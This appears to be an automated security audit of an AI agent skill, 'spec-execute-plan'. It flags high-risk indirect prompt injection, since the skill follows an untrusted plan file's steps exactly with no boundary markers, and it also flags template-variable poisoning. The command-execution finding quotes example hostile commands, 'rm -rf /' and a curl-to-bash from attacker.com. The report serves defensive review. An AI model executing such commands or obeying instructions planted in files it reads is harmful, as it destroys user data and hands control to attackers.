spec-execute-plan
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHPROMPT_INJECTIONCOMMAND_EXECUTION
Full Analysis
- [Indirect Prompt Injection] (HIGH): The skill is designed to ingest and execute instructions from an external 'plan file', creating a significant attack surface for indirect prompt injection.
- Ingestion points: Step 1 ('Read plan file') introduces untrusted external content into the agent's context.
- Boundary markers: Absent. There are no delimiters or system-level instructions provided to the agent to distinguish between the skill's operational logic and potentially malicious instructions embedded within the plan file.
- Capability inventory: The skill possesses 'Execute' and 'Verification' capabilities. In a development environment, 'Execute tasks' typically translates to shell command execution, file modifications, or script runs.
- Sanitization: None. The instructions explicitly command the agent to 'Follow each step exactly', which overrides the agent's internal safety filters by prioritizing the 'bite-sized steps' provided in the untrusted plan.
- [Command Execution] (HIGH): The skill facilitates arbitrary command execution via proxy. Since the agent is told to 'Mark as in_progress' and 'Follow each step exactly', any malicious command (e.g., 'rm -rf /' or 'curl attacker.com | bash') embedded as a 'step' in the plan file would likely be executed by the agent to satisfy the 'Core principle' of implementation.
- [Metadata Poisoning] (LOW): The skill uses template variables
${languageInstruction}and${args}. While standard for many skills, if these variables are populated from untrusted sources without validation, they could be used to inject instructions before the plan is even read.
Recommendations
- AI detected serious security threats
Audit Metadata